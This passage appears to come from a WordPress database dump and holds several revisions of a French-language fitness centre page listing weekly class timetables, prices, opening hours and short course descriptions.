padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:49:05', '2013-07-03 16:49:05', '', 11, 'http://www.crosstrainingcenter.be/?p=175', 0, 'revision', '', 0),
(176, 1, '2013-07-03 16:49:22', '2013-07-03 16:49:22', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-bottom: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:49:22', '2013-07-03 16:49:22', '', 11, 'http://www.crosstrainingcenter.be/?p=176', 0, 'revision', '', 0),
(183, 1, '2013-07-03 17:18:16', '2013-07-03 17:18:16', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n\r\n<table >\r\n<tr >\r\n<td >LUNDI</td>\r\n<td >MARDI</td>\r\n<td >MERCREDI</td>\r\n<td >JEUDI</td>\r\n<td >VENDREDI</td>\r\n</tr>\r\n<tr >\r\n<td >17h30</td>\r\n<td >TRX</td>\r\n<td >CARDIO</td>\r\n<td >RIP-KETTLE</td>\r\n<td >GLFE</td>\r\n</tr>\r\n</table>\r\n\r\n\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td >TRX</td>\r\n<td >CARDIO</td>\r\n<td >RIP-KETTLE</td>\r\n<td >GLFE</td>\r\n<td >TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 17:18:16', '2013-07-03 17:18:16', '', 11, 'http://www.crosstrainingcenter.be/?p=183', 0, 'revision', '', 0),
(177, 1, '2013-07-03 16:53:51', '2013-07-03 16:53:51', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"width: 100%;\">\r\n<tbody>\r\n<tr>\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">TRX</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">CARDIO</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border-top: hidden; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 0px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 0px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 0px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 0px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 0px; border-bottom: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 